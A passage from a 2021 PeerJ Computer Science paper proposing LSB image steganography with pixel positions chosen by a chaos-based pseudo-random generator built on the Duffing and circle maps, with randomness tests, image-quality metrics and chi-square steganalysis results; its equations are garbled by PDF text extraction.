embedding information � using traditional LSB pixel’s color modification for hiding, leaving no traces of steganography. PSEUDO-RANDOM GENERATOR BASED ON DUFFING MAP AND CIRCLE MAP For random pixel selection we are using pseudo-random generator (PRG) described in this section. Pseudo-random generators (also called Pseudo-random number generators (PRNG)) are software realized and unlike True-random generators (TRG) are easy for implementation with significantly lower cost and time consumption. This is why they are often used in cryptographic and steganographic systems. Examples of PRGs can be found in (Kordov, 2014, 2015b). The requirement resistance of PRGs is to different types of attacks are discussed in this section. Duffing map description The Duffing map is well known two dimensional non-linear discrete-time dynamical system with chaotic behavior (Holmes & Moon, 1983) which is a discrete version of Duffing oscillator (Van Dooren, 1988). Duffing map is given by: xtþ1 ¼ yt ytþ1 ¼ �bxt þ ayt � y3t ; (1) where xt and yt are double variables, calculated on every iteration, and a and b are fixed parameters of the Duffing map. For chaotic behavior the parameters are set to a = 2.75 and b = 0.2 (Hasan et al., 2017; Riaz et al., 2018). The initial test values we used for variables are x0 = −0.63825 and y0 = 0.37713 and Fig. 1 is a graphical representation of the Duffing map with the described values. Circle map description The Circle map is explored for chaotic behavior in Shenker (1982) and DeGuzman & Kelso (1991). It has random-like properties and is suitable for constructing PRGs (Kordov, 2015a). The Standard circle map equation is: uiþ1 ¼ ðui þ � � K 2p sinð2puiÞÞ mod 1; (2) where θ is a double variable and Ω and K are the controlling parameters with values Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 4/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Ω = 0.7128281828459045, K = 0.5. The initial value for the variable we used for experiments in this article is θ0 = −0.329054. Figure 2 is a graphical representation of the Circle map with the described values. -2 -1.5 -1 -0.5 0 0.5 1 1.5 2 x(t) -2 -1.5 -1 -0.5 0 0.5 1 1.5 2 y( t) Figure 1 Duffing Map Plot with a = 2.75, b = 0.2, x0 = −0.63825 and y0 = 0.37713. Full-size DOI: 10.7717/peerj-cs.380/fig-1 0 20 40 60 80 100 120 140 160 180 200 i -0.4 -0.2 0 0.2 0.4 0.6 0.8 1 1.2 Figure 2 Circle Map Plot with Ω = 0.7128281828459045, K = 0.5 and θ0 = −0.329054. Full-size DOI: 10.7717/peerj-cs.380/fig-2 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 5/21 http://dx.doi.org/10.7717/peerj-cs.380/fig-1 http://dx.doi.org/10.7717/peerj-cs.380/fig-2 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Random bit extraction process The proposed bit extraction process is using Eqs. (1) and (2) and contains the following steps: � The initial values of the constant parameters from Eqs. (1) and (2) are determined and the initial values of the double variables are set (described in the previous sections). � For additional security, first N iterations from Eq. (1) and first M iterations from Eq. (2) are skipped. (we randomly chose N = M = 541). � On every iteration of Eq. (1), xt and yt are used for calculation of additional double variable pt: temp1t ¼ jintegerðxt � 109Þjmod 2; temp2t ¼ jintegerðyt � 109Þjmod 2; pt ¼ temp1 XOR temp2 (3) and θi from Eq. (2) is used for calculation of the variable qt: qt ¼ jintegerðut � 109Þjmod 2 (4) � The produced random bit is obtained by performing XOR operation between the variables pt and qt. � The previous two steps are repeated until the necessary random binary sequence is reached. Key-sensitivity analysis This test is performed to determine the behavior of the proposed PRG if there are changes in the secret key that is used to produce binary sequences. To test the key sensitivity very similar secret keys are used (described in Table 2) by changing a single digit in one of the initial double variables. The results of the experiment are graphically presented in Fig. 3 and clearly show that the final binary sequence is different every time even if the secret keys are very Table 2 Secret keys values. Secret Variable values Key x0 y0 θ0 K1 −0.63825 0.37713 −0.329054 K2 −0.63824 0.37713 −0.329054 K3 −0.63826 0.37713 −0.329054 K4 −0.63825 0.37712 −0.329054 K5 −0.63825 0.37714 −0.329054 K6 −0.63825 0.37713 −0.329053 K7 −0.63825 0.37713 −0.329055 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 6/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ similar. This means the proposed PRG is very sensitive to any changes in the initial conditions. Key-space analysis The key-space includes the variety of possible values of the used variables in random bit generation. Equation (1) has two initial variables that can have different values (x0 and y0) and Eq. (2) has one variable −θ0. The parameters from the equations are constant so they cannot be part of the secret key. In addition to the secret key, the integer values of N and M also can have different values. Considering the floating point standard of IEEE for double variables (IEEE Computer Society, 2008) every double variable has precision about 10−15. Combining the three variables we have (1015)3 ≈ 2149 plus (232)2 for the two integer variables and final about 2213 for key-space. The required key-space for resisting brute-force attacks is 2100 (Alvarez & Li, 2006) which means that the proposed PRG is secure enough. Kay-space comparison is presented in Table 3. Figure 3 Circle Map Plot with Ω = 0.7128281828459045, K = 0.5 and θ0 = −0.329054. (A) Plot of binary sequence using secret key K1. (B) Plot of binary sequence using secret key K2. (C) Plot of binary sequence using secret key K2. (D) Plot of binary sequence using secret key K3. (E) Plot of binary sequence using secret key K4. (F) Plot of binary sequence using secret key K5. (G) Plot of binary sequence using secret key K6. Full-size DOI: 10.7717/peerj-cs.380/fig-3 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 7/21 http://dx.doi.org/10.7717/peerj-cs.380/fig-3 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Randomness evaluation The most important property of a PRG is to produce random binary numbers. To evaluate the randomness 1 billion bits are generated and the sequence is tested with the most popular statistical test software packages. NIST—random test The first software for randomness evaluation is NIST—Statistical Test Suite (Bassham et al., 2010) and includes 17 base tests. The testing process is performed by dividing the tested sequence into 1,000 subsequences with length of 1,000,000 bits. All the NIST need to have P-values in the range [0,1) to be considered for successfully passed. The results for all tests are summarized in Table 4. DIEHARD—ramdom test The second test package is DIEHARD software (Marsaglia, 1995) and contains 19 test for randomness. The tests applied for the same bitstream of 1 billion bits generated by our PRG. The acceptable range again for calculated P-values is [0,1) for passing the individual tests. The results for all tests are summarized in Table 5. All the tests in Table 5 have P-values in range [0,1), indicating that all the tests for randomness evaluation are passed. ENT—ramdom test The ENT statistical test software (Walker, 2008) is the last package we used for randomness evaluation. The ENT software tests are: Entropy test, Optimum compression test, χ2 distribution test, Arithmetic mean value test, Monte Carlo π estimation test, and Serial correlation coefficient test. In Table 6 are presented the results for all tests from ENT software. STEGANOGRAPHY IN COLOR IMAGES WITH RANDOM PIXEL SELECTION The proposed method combines the classical Least-significant bit (LSB) value replacement by choosing random positions of hiding in the image. The random order and the message encryption is performed by the proposed PRG. Message embedding algorithm The process is performed by the following steps: 1. The text information is transformed to vector V of binary sequence using ASCII table values of the characters. Table 3 Key-space comparison of PRGs. Reference Key-space Kordov (2015a) 2179 Kordov (2014) 2199 Kordov (2015b) 2199 Proposed 2213 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 8/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ 2. Control character sequence marking the end of the secret message is converted also in binary sequence and added to the vector V. (In our case we used “*#”). 3. The binary sequence in vector V is encrypted using XOR operation and random sequence produced by PRG with Secret Key 1. The result vector is V′. 4. The proposed PRG is used with the Secret Key 2 to produce two times 24 bits for selecting random position in an image with following rule: x position ¼ integerð24bitsÞ mod image width; y position ¼ integerð24bitsÞ mod image height (5) 5. If a pixel with position (x,y) is used the previous step is repeated until unused pixel position is found. 6. LSB technique is used for embedding three bits from vector V′ into RED, GREEN and BLUE color values of the selected pixel. 7. Steps 4–6 are repeated until the sequence from vector V′ is embedded into the final stego image. Message extraction algorithm The process is performed by the following steps: 1. The proposed PRG is used with the Secret Key 2 to produce two times 24 bits for selecting random position in the image with the following rule: x position ¼ integerð24bitsÞ mod image width; y position ¼ integerð24bitsÞ mod image height (6) 2. If a pixel with position (x,y) is used the previous step is repeated until unused pixel position is found. 3. The LSB values from RED, GREEN and BLUE colors are copied into vector V′. 4. Every 8 bits are transformed into char value and every last two obtained characters are compared with the control sequence that marks the end of the message (“*#”). 5. Steps 1–4 are repeated until the control sequence is reached. 6. The binary sequence in vector V′ is decrypted using XOR operation and random sequence produced by PRG with Secret Key 1. The result vector is V′. 7. Vector V is transformed from binary sequence into ASCII chars equivalent forming the original hidden text message. EXPERIMENTAL SETUP For our empirical experiments we used 2.40 GHz Intel Core i7-3630QM Dell Inspiron laptop with 8 GB RAM, x64 Windows 10 Pro operating system. The proposed method is realized using C++ programing language and the test images are personal photos taken within our university region. Sixteen color images are selected—8 with dimensions 256 × 256 and 8 with dimensions 512 × 512. MATLAB R2016a software is used for histogram plotting and image analysis and processing. The initial values used for PRG are x0 = −0.63825, y0 = 0.37713, θ0 = −0.329054 and for N and M − 541. Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 9/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ STEGANOGRAPHIC ANALYSIS In this section, the most used tests for steganographic analysis are included for testing the proposed stego algorithm. The color images are tested by embedding secret messages with different length. The messages are random only for the experiments and contain 100 letters (800 bits), 200 letters (1,600 bits), 300 letters (2,400 bits), 400 letters (3,200 bits), 500 letters (4,000 bits), 1,000 letters (8,000 bits), and 2,000 letters (16,000 bits). All the test in Supplemental File 1 and 2. Visual analysis This is the most mandatory test for steganographic algorithm. A necessary requirement for any stego algorithm is to leave no visual traces of embedded secret messages or message container changes. Figure 4 shows one of the test images with its corresponding stego images with different lengths of embedded information. Figure 4 clearly demonstrates that there are no visual differences between the images and no traces of hidden messages. More examples are presented in Fig. 5, to confirm that there are no visual trace of steganography in corresponding stego images. Histogram analysis The image histograms are used for graphical representation of the tonal distribution of the red, green and blue colors. This experiment is designed to analyze if there are any changes in color distribution when the proposed steganographic method is applied. Table 4 NIST test suite results. The minimum pass rate for each statistical test with the exception of the random excursion (variant) test is approximately = 980 for a sample size = 1,000 binary sequences. The minimum pass rate for the random excursion (variant) test is approximately = 642 for a sample size = 657 binary sequences. NIST test P-value Pass rate Frequency 0.844641 991/1,000 Block-frequency 0.140453 993/1,000 Cumulative sums (Forward) 0.002820 993/1,000 Cumulative sums (Reverse) 0.723804 995/1,000 Runs 0.664168 991/1,000 Longest run of Ones 0.803720 996/1,000 Rank 0.473064 994/1,000 FFT 0.552383 991/1,000 Non-overlapping templates 0.513087 990/1,000 Overlapping templates 0.911413 996/1,000 Universal 0.494392 994/1,000 Approximate entropy 0.540204 989/1,000 Random-excursions 0.480341 650/657 Random-excursions Variant 0.531001 648/657 Serial 1 0.989786 993/1,000 Serial 2 0.413628 990/1,000 Linear complexity 0.574903 995/1,000 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 10/21 http://dx.doi.org/10.7717/peerj-cs.380/supp-1 http://dx.doi.org/10.7717/peerj-cs.380/supp-2 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Figure 6 shows the histograms of a test image with its corresponding stego images and Table 7 shows average pixel intensity values. The histogram attack method (Fridrich & Goljan, 2002) is historically the first statistical attack described in the resources. It is based on the fact that with LSB embedding, the even pixel values either remain unchanged (unmodified) or are being increased by 1, while the odd pixel values either remain unchanged or decrease. Thus, the values (2i, 2i + 1) form a pair of values (PoV), which are exchanged during embedding. This asymmetry in the embedding function can be used and a statistical test applied to confirm or deny that the Table 5 DIEHARD statistical test results. DIEHARD test P-value Birthday spacings 0.3811619 Overlapping 5-permutation 0.7670145 Binary rank (31 × 31) 0.6561000 Binary rank (32 × 32) 0.4885290 Binary rank (6 × 8) 0.4461883 Bitstream 0.5432060 OPSO 0.6106608 OQSO 0.5272964 DNA 0.5160838 Stream count-the-ones 0.4152015 Byte count-the-ones 0.6557379 Parking lot 0.5087899 Minimum distance 0.2999120 D spheres 0.8421500 Squeeze 0.5968610 Overlapping sums 0.4620793 Runs up 0.6446245 Runs down 0.2258565 Craps 0.7826510 Table 6 ENT statistical test results. ENT test Result Entropy 7.999999 bits per byte Optimum compression OC would reduce the size of this 125,000,000 byte file by 0% χ2 distribution For 125,000,000 samples is 211.12, and randomly would exceed this value 97.92% of the times Arithmetic mean value 127.4897 (127.5 = random) Monte Carlo π estimation 3.142024754 (error 0.01%) Serial correlation coefficient −0.000085 (totally uncorrelated = 0.0) Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 11/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ even values follow the known distribution. The statistical steganalysis based on the Chi-square method is based on this. It makes a histogram (the frequency of occurrence of each color in the image) of the color distribution and based on it, pairs of adjacent values (PoV) are formed, differing in the youngest bit. Then a theoretical histogram of the color distribution is made, showing the expected distribution of the values in the presence of hidden information and pairs of adjacent values are formed again. The difference between the observed and expected occurrence frequencies for each pair is sought. In our case the observation of Fig. 6 shows that the tonal distribution is not changed when the secret messages are hidden in the plain image. Peak signal-to-noise ratio and structural similarity analysis The Peak Signal-to-Noise Ratio (PSNR) measure the possible maximum power of the clean signal against the power of the noise signal. Poorly changing the pixel values of an image can lead to corruption of the image quality which may uncover a possible steganography. PSNR is calculated using the following equation: PSNR ¼ 10log10 MAX2 MSE ðdBÞ; (7) where MAX is the maximum possible value of the pixel color. Considering that every pixel has 8 bits for red, green and blue color, we use the average value of the three values Figure 4 Visual comparison of a container image and corresponding stego images. (A) Container color image. (B) Stego image with 100 chars embedded. (C) Stego image with 200 chars embedded. (D) Stego image with 300 chars embedded. (E) Stego image with 400 chars embedded. (F) Stego image with 500 chars embedded. The photos were taken by the authors. Full-size DOI: 10.7717/peerj-cs.380/fig-4 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 12/21 http://dx.doi.org/10.7717/peerj-cs.380/fig-4 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ meaning MAX = 28 − 1 = 255. MSE is the mean square error between the plain and stego images defined as: MSE ¼ 1 NM XN i¼1 XM j¼1 ðpx;y � sx;yÞ2 (8) where px,y and sx,y are the corresponding pixel values from the plain and stego images, respectively. Considering the color images have red, green and blue values for every pixel, the (px,y − sx,y) 2 is calculated by: ðrValueplain−rValuestegoÞ2 þ ðgValueplain−gValuestegoÞ2 þ ðbValueplain−bValuestegoÞ2 3 (9) The Structural Similarity (SSIM) is another method used in steganographic analysis proposed and described in Wang et al. (2004). The test is designed to determine the similarity between two images, in our case the similarity between plain and corresponding stego images. Values close to 1 are indicators for the best possible structural similarity between the compared images. Part of the obtained values for MSE, PSNR and SSIM are shown in Table 8. The MSE and PSNR values are calculated for images with 100 chars (800 bits), 1,000 chars A) E) B) F) C) G) D) H) Figure 5 Additional examples of the proposed steganographic scheme. (A) Container image—Main corpus. (B) Container image—Monument. (C) Container image—Solarpanels. (D) Container image—Fitness. (E) Stego image—Main corpus. (F) Stego image—Monument. (G) Stego image— Solar panels. (H) Stego image—Fitness. The photos were taken by the authors. Full-size DOI: 10.7717/peerj-cs.380/fig-5 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 13/21 http://dx.doi.org/10.7717/peerj-cs.380/fig-5 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ (8,000 bits), and 2,000 chars (16,000 bits) embedded. All the results are available in Supplemental File 3. Table 8 shows high values for PSNR (over 60 dB) meaning the stego algorithm do not destroy the image quality with considered minimum requirement of 20–30 dB for low quality. The obtained values for SSIM are close to the best possible value −1. Additional metrics analysis Some researchers use different metrics for steganographic analysis of their methods. For evaluation of the proposed algorithm we performed additional experiments for the most used indicators—Average Difference (AD), Structural Content (SC), Normalized Cross-Correlation (NCC), Maximum Difference (MD), Laplacian Mean Squared Error (LMSE), Normalized Absolute Error (NAE), Image Quality Index (IQI). The best possible value for SC, NCC, MD and IQI is 1 and for AD, LMSE and NAE is 0. The results for our method are presented in Table 8. All the results are available in Supplemental File 3. The obtained results in Table 9 show results close to the perfect values demonstrating the stability and efficiency of the proposed stegoalgorithm. Figure 6 Histogram analysis of a plain image and corresponding stego images. (A) Container color image. (B) Stego image with 100 chars embedded. (C) Stego image with 200 chars embedded. (D) Stego image with 300 chars embedded. (E) Stego image with 400 chars embedded. (F) Stego image with 500 chars embedded. Full-size DOI: 10.7717/peerj-cs.380/fig-6 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 14/21 http://dx.doi.org/10.7717/peerj-cs.380/supp-3 http://dx.doi.org/10.7717/peerj-cs.380/supp-3 http://dx.doi.org/10.7717/peerj-cs.380/fig-6 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Table 8 The MSE, PSNR and SSIM values for images with 100 chars (800 bits), 1,000 chars (8,000 bits), and 2,000 chars (16,000 bits) embedded. File name Stego Image with 100 chars embbeded Stego Image with 1,000 chars embbeded Stego Image with 2,000 chars embbeded MSE PSNR SSIM MSE PSNR SSIM MSE PSNR SSIM f1-256x256 0.001587 76.12527 0.999985 0.016464 65.96539 0.999859 0.032562 63.00366 0.999723 f2-256x256 0.001480 76.42789 0.999986 0.015305 66.28259 0.999856 0.030289 63.31800 0.999715 f3-256x256 0.001541 76.25239 0.999993 0.016159 66.04664 0.999917 0.031754 63.11288 0.999845 f4-256x256 0.001511 76.33925 0.999996 0.015839 66.13363 0.999958 0.031494 63.14851 0.999921 f5-256x256 0.001434 76.56432 0.999987 0.015823 66.13782 0.999865 0.031296 63.17595 0.999732 f6-256x256 0.001556 76.20960 0.999992 0.015579 66.20535 0.999910 0.030823 63.24209 0.999825 f7-256x256 0.001633 76.00177 0.999993 0.015717 66.16723 0.999929 0.030640 63.26797 0.999862 f8-256x256 0.001526 76.29560 0.999993 0.015289 66.28693 0.999939 0.030563 63.27879 0.999878 f1-512x512 0.000404 82.06314 0.999996 0.003708 72.43954 0.999969 0.007530 69.36273 0.999936 f2-512x512 0.000366 82.49349 0.999996 0.003826 72.30319 0.999956 0.007805 69.20715 0.999910 f3-512x512 0.000397 82.14587 0.999997 0.003601 72.56648 0.999975 0.007263 69.51953 0.999949 f4-512x512 0.000408 82.02237 0.999998 0.003979 72.13336 0.999984 0.007813 69.20290 0.999969 f5-512x512 0.000381 82.31620 0.999996 0.003731 72.41281 0.999960 0.007599 69.32331 0.999917 f6-512x512 0.000347 82.72579 0.999998 0.003601 72.56648 0.999978 0.007313 69.48998 0.999955 f7-512x512 0.000404 82.06314 0.999997 0.004047 72.05905 0.999968 0.008007 69.09608 0.999938 f8-512x512 0.000370 82.44849 0.999998 0.003792 72.34234 0.999979 0.007710 69.26054 0.999958 Table 7 Average pixel intensity comparison. File name Plain Image Red Stego Image Red Plain Image Green Stego Image Green Plain Image Blue Stego Image Blue f1-256x256 157.731 159.385 130.011 157.731 159.385 130.010 f2-256x256 152.790 127.875 102.467 152.790 127.875 102.466 f3-256x256 127.915 129.950 134.474 127.915 129.950 134.473 f4-256x256 111.816 115.017 86.290 111.816 115.017 86.290 f5-256x256 173.490 159.482 142.303 173.490 159.482 142.302 f6-256x256 114.214 114.245 111.757 114.214 114.245 111.757 f7-256x256 111.514 141.846 107.249 111.514 141.846 107.249 f8-256x256 120.503 117.243 108.933 120.503 117.243 108.933 f1-512x512 157.678 159.365 129.554 157.678 159.365 129.554 f2-512x512 152.831 127.877 102.465 152.831 127.877 102.465 f3-512x512 127.888 129.910 134.402 127.888 129.910 134.402 f4-512x512 111.793 115.004 86.060 111.793 115.004 86.060 f5-512x512 173.511 159.513 142.351 173.511 159.513 142.351 f6-512x512 114.465 114.475 111.955 114.465 114.475 111.954 f7-512x512 111.546 141.904 107.253 111.546 141.904 107.253 f8-512x512 120.562 117.298 108.986 120.562 117.298 108.986 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 15/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Comparison In order to compare the proposed method with other image steganographic algorithms we use the presented metrics (where available) in related articles. The main metrics for defining the security and the reliability of the stegomethods are related to preserving the quality of the cover images and keeping the similarity with the stego images. For the image quality estimation the PSNR and MSE metrics are applied, and for the similarity of the cover and corresponding stego images—SSIM metric. The following Table 9 contains the most used metrics. The test results in Table 10 show that the presented algorithm has satisfying statistical properties and provides better security level than compared methods. Chi-square analysis In this article, steganalytic software based on the Chi-square method is used (available at http://www.guillermito2.net/stegano/tools/index.html). The software graphically shows the positions of the pixel values according to the image Chi-square value of the tested image. The red curve indicates the Chi-square values of the tested images and the green values represent the average value of the LSBs. If the green values are below the red curve the test didn’t pass successfully. Otherwise, it is assumed that the test was passed successfully, that is, there are no indications of a hidden message. For visual comparison we constructed a single screen shot image with six diagrams containing the results of the software. Table 9 The Average Difference (AD), Structural Content (SC), Normalized Cross-Correlation (NCC), Maximum Difference (MD), Laplacian Mean Squared Error (LMSE), Normalized Absolute Error (NAE), Image Quality Index (IQI). File name AD SC NCC MD LMSE NAE IQI f1-256x256 0.000061 1.00000 0.999999 1.000000 0.000003 0.000010 1.000000 f2-256x256 0.000107 1.00000 1.000000 1.000000 0.000045 0.000011 1.000000 f3-256x256 0.000015 1.00000 0.999999 1.000000 0.000009 0.000012 1.000000 f4-256x256 −0.000107 0.99999 1.000001 1.000000 0.000008 0.000014 1.000000 f5-256x256 −0.000122 0.99999 1.000001 1.000000 0.000029 0.000009 1.000000 f6-256x256 0.000336 1.00000 0.999998 1.000000 0.000005 0.000014 1.000000 f7-256x256 0.000076 1.00000 0.999999 1.000000 0.000026 0.000013 1.000000 f8-256x256 0.000000 1.00000 1.000000 1.000000 0.000008 0.000013 1.000000 f1-512x512 0.000000 1.00000 1.000000 1.000000 0.000001 0.000003 1.000000 f2-512x512 0.000000 1.00000 1.000000 1.000000 0.000017 0.000003 1.000000 f3-512x512 0.000023 1.00000 1.000000 1.000000 0.000004 0.000003 1.000000 f4-512x512 −0.000019 1.00000 1.000000 1.000000 0.000004 0.000004 1.000000 f5-512x512 0.000008 1.00000 1.000000 1.000000 0.000024 0.000002 1.000000 f6-512x512 0.000034 1.00000 1.000000 1.000000 0.000003 0.000003 1.000000 f7-512x512 0.000038 1.00000 1.000000 1.000000 0.000078 0.000003 1.000000 f8-512x512 0.000072 1.00000 0.999999 1.000000 0.000006 0.000003 1.000000 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 16/21 http://www.guillermito2.net/stegano/tools/index.html http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Figure 7 demonstrates the results of our tests. The first is a diagram of the container and below are the corresponding stego files. The red curve is constantly at zero value leaving no green point under it. The Chi-square tests show that there is no trace of steganography in the stego files, indicated that the proposed algorithm can withstand against Chi-square attacks. COMPUTATIONAL AND COMPLEXITY ANALYSIS The proposed algorithm is tested with the conditions described in Experimental Setup Section. Concerning the complexity of our method, it is defined by the computations and iterations of the calculations for encryption and embedding operations. Considering the linear computation of every operation(random numbers generation, LSB modification Table 10 Average obtained values for PSNR, MSE and SSIM. Reference Average PSNR Average MSE Average SSIM Proposed 72.302898 0.007316938 0.999953563 Chatterjee, Ghosal & Sarkar (2020) 51.1070 0.4990 0.9981 Yadav & Dutta (2017) 65.0345 0.0374 – Amirulhaqi, Purboyo & Nugrahaeni (2017) 66.3124 0.1473 – Baby et al. (2015) 55.4522 – 0.7764 Gaurav & Ghanekar (2018) 47.8039 1.4468 0.9989 A) B) C) D) E) F) Figure 7 Chi-Square analysis of a container image and the corresponding stego images. (A) Con- tainer color image. (B) Stego image with 100 chars embedded. (C) Stego image with 200 chars embedded. (D) Stego image with 300 chars embedded. (E) Stego image with 400 chars embedded. (F) Stego image with 500 chars embedded. Full-size DOI: 10.7717/peerj-cs.380/fig-7 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 17/21 http://dx.doi.org/10.7717/peerj-cs.380/fig-7 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ etc.) do not affect the complexity, the theoretical complexity of the proposed scheme is θ(8 * n) equated to θ(n), where n defines the input data of the algorithm. The input data of the algorithm is the secret message for embedding which is processed as bit sequence (8 bits for a character). The image parameters (width and height) do not increase the time consumption, because the number of random selected pixels depends only from the length of the embedded secret message. However, the images size is related to the memory consumption. The following Table 11 summarizes the results of our empirical experiment for embedding different size of secret text messages. The results in Table 11 show that the proposed method is very fast and the computational complexity depends entirely of the secret text length. CONCLUSIONS In this manuscript a new method for steganography is presented. The base of the proposed algorithm is a PRG used for secret message encryption and random pixels selection for data embedding. Proving the level of security the PRG is statistically tested for randomness and key-sensitivity, and the key-space analysis defines a necessary level of brute-force attacks resistance with minimum requirement 2100 for key-space. The steganographic algorithm is evaluated with visual analysis, file size comparison, histogram analysis and chi-square analysis and the results show that there are no traces of steganography when a secret message is hidden in the tested color images. The PSNR Table 11 Time complexity for secret text message encryption/decryption and embedding/extracting in color images. File name File dimensions Length of the secret message 100 chars 500 chars 1,000 chars 1,500 chars 2,000 chars 800 bits (s) 4,000 bits (s) 8,000 bits (s) 12,000 bits (s) 16,000 bits (s) f1-256x256.bmp 256 × 256 0.001047 0.004402 0.008797 0.011602 0.016867 f2-256x256.bmp 256 × 256 0.000982 0.004679 0.009034 0.012969 0.017281 f3-256x256.bmp 256 × 256 0.001072 0.004439 0.009252 0.012871 0.017199 f4-256x256.bmp 256 × 256 0.001080 0.004546 0.008729 0.012998 0.017225 f5-256x256.bmp 256 × 256 0.001063 0.004473 0.008755 0.012997 0.017303 f6-256x256.bmp 256 × 256 0.001110 0.004423 0.008684 0.013166 0.016440 f7-256x256.bmp 256 × 256 0.001126 0.004425 0.009174 0.012913 0.017469 f8-256x256.bmp 256 × 256 0.001076 0.004401 0.008613 0.013002 0.016745 f1-512x512.bmp 512 × 512 0.001191 0.004556 0.008669 0.012760 0.017055 f2-512x512.bmp 512 × 512 0.001162 0.004795 0.008789 0.012951 0.017146 f3-512x512.bmp 512 × 512 0.001203 0.004614 0.008765 0.012883 0.017187 f4-512x512.bmp 512 × 512 0.001181 0.004670 0.009005 0.012835 0.017069 f5-512x512.bmp 512 × 512 0.000949 0.004530 0.009063 0.013088 0.016204 f6-512x512.bmp 512 × 512 0.001173 0.004571 0.008818 0.012261 0.017133 f7-512x512.bmp 512 × 512 0.001159 0.004522 0.008727 0.012643 0.017098 f8-512x512.bmp 512 × 512 0.001123 0.004362 0.008808 0.011896 0.017253 Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 18/21 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ analysis indicates that the quality of the signal in stego images remains high, considered that the good quality of the signal is above 20 dB. Additional tests indicates high similarity between cover and the corresponding stego images for proving the security and the reliability of the proposed scheme. The presented method can be improved for real-time video communication with embedded data. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research is supported by the European Regional Development Fund and the Operational Program “Science and Education for Smart Growth” under contract UNITe No. BG05M2OP001-1.001-0004-C01 (2018–2023). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: European Regional Development Fund: BG05M2OP001-1.001-0004-C01 (2018–2023). Competing Interests The authors declare that they have no competing interests. Author Contributions � Krasimir Kordov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Stanimir Zhelezov conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The source code are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.380#supplemental-information. REFERENCES Abd-El-Atty B, Iliyasu AM, Alaskar H, El-Latif A, Ahmed AA. 2020. A robust quasi-quantum walks-based steganography protocol for secure transmission of images on cloud-based e-healthcare platforms. Sensors 20(11):3108 DOI 10.3390/s20113108. Alvarez G, Li S. 2006. Some basic cryptographic requirements for chaos-based cryptosystems. International Journal of Bifurcation and Chaos 16(8):2129–2151 DOI 10.1142/S0218127406015970. Kordov and Zhelezov (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.380 19/21 http://dx.doi.org/10.7717/peerj-cs.380#supplemental-information http://dx.doi.org/10.7717/peerj-cs.380#supplemental-information http://dx.doi.org/10.7717/peerj-cs.380#supplemental-information http://dx.doi.org/10.3390/s20113108 http://dx.doi.org/10.1142/S0218127406015970 http://dx.doi.org/10.7717/peerj-cs.380 https://peerj.com/computer-science/ Amirulhaqi A, Purboyo TW, Nugrahaeni RA. 2017. Security on gif images using steganography with lsb method, spread spectrum and the vigenere cipher. International Journal of Applied Engineering Research 12(23):13604–13609. Baby D, Thomas J, Augustine G, George E, Michael NR. 2015. A novel dwt based image securing method using steganography. Procedia Computer Science 46:612–618 DOI 10.1016/j.procs.2015.02.105. Bassham L III, Rukhin A, Soto J, Nechvatal J, Smid M, Barker E, Leigh S, Levenson M, Vangel M, Banks D, Heckert A, Dray J, Vo S. 2010. Sp 800-22 rev. 1a. a statistical test suite for random and pseudorandom number generators for cryptographic applications. Gaithersburg: National Institute of Standards & Technology DOI 10.6028/NIST.SP.800-22r1a. Chatterjee A, Ghosal SK, Sarkar R. 2020. Lsb based steganography with ocr: an intelligent amalgamation. Multimedia Tools and Applications 79(17–18):1–19 DOI 10.1007/s11042-019-08472-6. Cox I, Miller M, Bloom J, Fridrich J, Kalker T. 2007. Digital watermarking and steganography. Second Edition. Burlington: Morgan Kaufmann Publishers. DeGuzman GC, Kelso JAS. 1991. Multifrequency behavioral patterns and the phase attractive circle map. Biological Cybernetics 64(6):485–495 DOI 10.1007/BF00202613. Fridrich J, Goljan M. 2002. Practical steganalysis of digital images: state of the art. Security and Watermarking of Multimedia Contents IV, International Society 